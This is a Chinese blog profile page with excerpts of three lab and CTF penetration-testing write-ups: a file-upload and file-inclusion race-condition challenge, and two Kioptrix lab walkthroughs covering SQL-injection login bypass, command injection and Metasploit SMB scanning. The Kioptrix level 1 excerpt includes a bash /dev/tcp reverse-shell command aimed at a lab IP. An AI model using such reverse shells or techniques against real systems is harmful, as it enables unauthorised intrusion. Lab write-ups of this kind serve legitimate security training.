自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 (文件上传,文件包含,条件竞争)-题

php内容,最后删除。这里就用到了条件竞争,利用保存到删除的时间差,去访问我们上传的文件,从而导致代码执行。这里运用bp intruder 模块,不断上传,和利用文件包含访问上传的文件。查看网页源代码后,只显示了前端文字,无其他内容。burpsuite拦截抓包,利用php://filter/ 协议来读取文件内容。这里我上传了各类文件,发现都跳转到upload.php 页面,其显示文件上传类型格式不正确,即将删除,删除成功。需要转换为post请求,并发送给Repeater,得到其后端验证base64编码。

2024-04-16 00:06:19 505

原创 kioptrix-level2 渗透测试

3306 (3306/tcp open mysql MySQL (unauthorized))端口,可以利用。开启了80(80/tcp open http Apache httpd 2.0.52 ((CentOS))),一个登录框,看见登录框,就想到了弱口令和sql注入,首先用sql注入万能密码来一波。首先它是一个web控制台,可以ping计算机网络,这就想到了远程命令执行漏洞。根据nmap扫描结果显示,可以发现CentOS,其权限为apache,之后尝试反弹shell。

2023-09-20 16:54:16 525 1

原创 kioptrix-leva1靶场渗透测试

msf5 auxiliary(scanner/smb/smb_version) > set rhost 192.168.122.133 //设置被攻击目标ip。msf5 auxiliary(scanner/smb/smb_version) > set rport 139 //设置端口。msf5 auxiliary(scanner/smb/smb_version) > run //运行。目标机 bash -i >& /dev/tcp/192.168.122.128/2333 0>&1。

2023-09-17 16:42:53 1053 2

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除